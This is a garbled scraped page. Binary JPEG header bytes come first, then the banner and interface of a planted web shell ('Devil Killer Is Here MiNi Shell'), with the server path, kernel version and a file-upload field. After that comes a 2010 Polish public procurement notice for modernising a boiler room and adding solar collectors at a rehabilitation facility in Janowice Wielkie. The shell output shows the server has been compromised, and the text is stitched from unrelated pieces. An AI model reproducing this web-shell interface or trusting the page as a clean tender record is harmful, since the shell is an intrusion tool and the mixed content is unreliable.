JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100725/223400-N-2010.html

<p class="kh_header"><b>Janowice Wielkie: Termomodernizacja budynku  SP ZOZ  Zespołu Profilaktyki i Rehabilitacji 
 w Janowicach Wielkich

 I etap 2010 r.  :             A.   Przebudowa kotłowni na paliwo stałe 
                                       B.  Układ solarny</b><br>
<b>Numer ogłoszenia: 223400 - 2010; data zamieszczenia: 25.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich - SP ZOZ , ul. Karola Świerczewskiego 12, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 0-75 7547500, faks 0-75 7547503.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku  SP ZOZ  Zespołu Profilaktyki i Rehabilitacji 
 w Janowicach Wielkich

 I etap 2010 r.  :             A.   Przebudowa kotłowni na paliwo stałe 
                                       B.  Układ solarny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje 
- w ramach zadania termomodernizacji obiektu przebudowę kotłowni z  wykonaniem instalacji elektrycznych i  sterowania urządzeń technologicznych  , układu solarny.  

Część A.

Przebudowana kotłownia pracować będzie na potrzeby co. i c.w.u. obiektu. 
W miejsce kotłów parowych zabudowane zostaną kotły opalane paliwem ekologicznym eko                                                                                                                                                                                                                     - groszkiem, węglem kamiennym.
Zaprojektowano kotłownię wodną systemu otwartego o parametrach 90/700C. 
Dla pokrycia zapotrzebowania na ciepło dobrano dwa automatyczne kotły z grupy wysoce ekologicznych , typu KW EKOCENTR każdy o mocy 250 [kW]  z dodatkowym rusztem.                   Z uwagi na drugi ruszt, do współspalania można używać dodatkowo drewna lub mieszanek biomasowo -węglowych (np. trociny lub granulat). Zmodernizowana kotłownia, zlokalizowana zostanie w miejscu istniejącej,  której  wszystkie  urządzenia przewidziane są do demontażu.
W  ramach przebudowy  kotłowni - z  istniejącej  kotłowni wydzielone będą pomieszczenia,            w których zainstalowane zostaną nowe kotły oraz zasobniki c.w.u. wspomagane układem solarnym.
Dla potrzeb budynku przewidziano 4 obiegi grzewcze - I i II obieg co. dla potrzeb budynku,            III - woda basenowa,  IV obieg instalacja c.w.u.  współpracująca  z  układem  solarnym.
Dla potrzeb nowej kotłowni wykorzystany zostanie istniejący skład paliwa oraz skład żużlu zachowano ten sam ciąg technologiczny dostarczania paliwa do kotłów i ich opróżniania.
Pracą każdego kotła sterować będą regulatory typu R501. Regulatorem nadrzędnym kaskady kotłów będzie Sterownik PXC100.D z ekranem PXM20 sterujący kaskadą kotłów i poszczególnymi obiegami grzewczymi oraz układem solarnym.
 
Przewody  w  kotłowni   zaprojektowano z  rur  stalowych   czarnych   przewodowych, łączonych   przez   spawanie   oraz   rur   stalowych   ocynkowanych,  izolowane.   
Woda instalacyjna uzdatniana będzie przez urządzenie Cosmowater.

Z części elektrycznej , dla potrzeb zasilania urządzeń w kotłowni  zaprojektowano: 
-instalacją zasilającą montowaną na tynku,  w listwach instalacyjnych , 
-instalację  sterowania urządzeń technologicznych,
-uziemienie ochronne przeciwporażeniowe z wykorzystaniem wyłączników różnicowoprądowych. 

Część B. 

Zaprojektowano system solarny na bazie kolektorów słonecznych typu CosmoSUN (Bimsplus) lub równoważnych, do podgrzewu ciepłej wody użytkowej.  Kolektory będą umieszczone na dachu budynku na typowej konstrukcji dostarczanej przez producenta. Rurarz od kolektorów do podgrzewacza będzie wykonany z rur miedzianych łączonych lutem. Kolektory montowane będą  na istniejącym, nowym  dachu z blachodachowki. 
Wyposażenie instalacji solarnej stanowią kolektory słoneczne CosmoSun Basic 2.51, Fk  = 2,19 [m2], składające się z 28 elementów. 
Obieg solarny został zaprojektowany jako instalacje zamknięta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości 
                                     
                              dla części A         - 10 000     PLN    (słownie: dziesięć tysięcy złotych)
                              dla części B         - 10 000     PLN    (słownie: dziesięć tysięcy złotych) 
                              dla części A i  B  -  20 000     PLN    (słownie: dwadzieścia tysięcy złotych)


2. Wadium może być wniesione w następujących formach:

a)	pieniądzu

b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej         z  tym ,  że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,

c)	gwarancjach bankowych,

d)	gwarancjach ubezpieczeniowych,

e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,          poz. 1158, z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:

a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego),  gwaranta         ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,

b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,

c)	kwotę gwarancji,

d)	termin ważności gwarancji,

e)  zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :

- że  wykonawca ,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy P.z.p.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 ustawy P.z.p.,            lub  pełnomocnictw , a nie udowodnił , że nie wynikało to z przyczyn leżących po jego stronie

  lub

-  że wykonawca ,  którego ofertę wybrano:
  - odmówił podpisania umowy na warunkach określonych w ofercie,     lub
- nie wniósł zabezpieczenia należytego wykonania umowy,                  lub
  - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i  2.e).

4. Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem - na rachunek Zamawiającego,  otwarty 
 w  PLN  :   
Kredyt Bank S.A. Oddział Jelenia Góra
numer 63 1500 1429 1214 2002 9595 0000

z odpowiednią adnotacją w tytule wpłaty :         Wadium -  kotłownia
                                                               lub    Wadium -  solary
                                                               lub    Wadium - kotłownia+solary
      
5.	Wadium wnoszone w innej, niż  pieniądz dopuszczonej przez Zamawiającego formie / formach wykonawca wnosi do Zamawiającego  przy czym ,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u Głównej Księgowej - budynek  Zamawiającego- segment: administracja parter _ księgowość lub innej, wskazanej osoby .

6.	Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie _formach wykonawca może  dołączyć do oferty - pod warunkiem ,  że umieszczone zostanie w osobnej  kopercie  opisanej (nazwa wykonawcy, adnotacja: Wadium  (stosowny dopisek) w sposób umożliwiający zdeponowanie wadium  u  Głównej Księgowej lub innej, wskazanej osoby , przed upływem terminu do otwarcia  ofert - bez konieczności naruszenia  koperty , w której znajduje się oferta. 
 
7.  Wadium należy wnieść przed upływem terminu do składania ofert, przy czym wniesienie wadium    w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu do składania ofert. 

Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.

8.  Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.
  
9.  Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  wykonawca w  odpowiedzi  na wezwanie , o którym  mowa w punkcie 27.  nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń o których mowa w art.25 ust.1 u.p.z.p., lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.  

10.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 

a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie  

b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy

c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

UWAGA:
Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. - poparta należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie-  prac budowlanych:
a)  polegających 

dla części A. : na budowie lub przebudowie  co najmniej dwóch (2 obiektów) , w których wykonany był zakres rzeczowy robót budowlanych  objęty przedmiotem zamówienia tj.  kotłownia wodna systemu otwartego, z minimum, pracującymi w kaskadzie,   dwoma kotłami opalanymi paliwem ekologicznym eko  - groszkiem, węglem kamiennym .   
 
dla części B.: na wykonaniu co najmniej dwóch (2)  systemów solarnych na bazie kolektorów słonecznych umieszczonych na dachu budynków co najmniej dwukondygnacyjnych, współpracujących z kotłownią , o powierzchni absorbera pakietu solarnego  co najmniej 20 m2 .
                                                                                                                                                                              Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych z wymaganym zakresem sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW, z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN -  należy podać kwotę w PLN , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień  23.07.2010 r. 
2. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 


Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym:
- jeżeli dotyczy to wiedzy i doświadczenia czyli niezbywalnych elementów wykonawcy, inny podmiot udostępniający wiedzę i doświadczenie, musi wystąpić przy realizacji przedmiotu zamówienia w charakterze podwykonawcy. 

3. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

4. Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW
5.Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. - należy wskazać do uczestnictwa w wykonaniu niniejszego zamówienia niezależnie od realizowanej części zamówienia:

 
a)	Kierownika Budowy   posiadającego :

°  co najmniej pięć (5) lat doświadczenia zawodowego na stanowisku kierownika budowy, 

° uprawnienia budowlane w specjalności instalacyjnej do kierowania robotami budowlanymi- bez ograniczeń, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
          lub 
    odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej    obowiązujących przepisów w zakresie co najmniej sieci, instalacji i urządzeń cieplnych, wentylacyjnych,

 
° ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do   właściwej  Izby Inżynierów Budownictwa,

b)	Kierownika robót lub majstra robót, posiadającego: 

°  uprawnienia  budowlane w specjalności konstrukcyjno - budowlanej w ograniczonym zakresie, do kierowania  robotami budowlanymi  lub 
odpowiadające im ważne  uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, które zostały wydane na podstawie wcześniej wydanych przepisów

c)	Kierownika robót lub majstra robót,  posiadającego :

°  uprawnienia budowlane w specjalności instalacyjnej  bez ograniczeń , w zakresie sieci, instalacji                   i urządzeń elektrycznych i elektroenergetycznych
      lub 
  odpowiadające im ważne uprawnienia budowlanej,  które zostały wydane na podstawie wcześniej
  wydanych przepisów w zakresie co najmniej instalacji i urządzeń elektrycznych,

d) Inżynier ds. AKPiA 
	
°  posiadający wykształcenie wyższe techniczne w specjalności automatyka lub automatyka i   
  pomiary lub elektronika lub elektryczne i mający doświadczenie zawodowe w sprawowaniu lub     kierowaniu robotami AKPiA w co najmniej dwóch zamówieniach z zakresu gospodarki grzewczej, i/lub wentylacyjnej 

2. Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
3. Dysponowanie osobami  wymienionymi  powyżej , należy traktować jako minimalne wymagania Zamawiającego, nie wyczerpujące całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań wykonawcy.

4.	Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:

1)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do IDW i fakultatywnie wzór Załącznika Nr 5.1

2)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego- Załącznik Nr 6 do IDW.

5. Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 


Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW. 


6. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał  kadrowy - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

7. Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW

   
8. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. - należy  poprzeć  posiadaniem: 

a)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej 
  dla części A       -  200 000  PLN 
  dla części B       -  200 000  PLN 
  dla części A i B  - 400 000  PLN

2.Wykonawcy zobowiązani są przedłożyć: a)informację z banku  lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.


b)  opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość umownej ceny ofertowej za wykonanie przedmiotu zamówienia. 


Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta
uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy.

3. Wykonawca może polegać na  zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 


Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym - od takiego podmiotu wymagane jest przedłożenie informacji jak od wykonawcy

4. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

5. Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)               - Załącznik Nr 2 do IDW


  
6. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
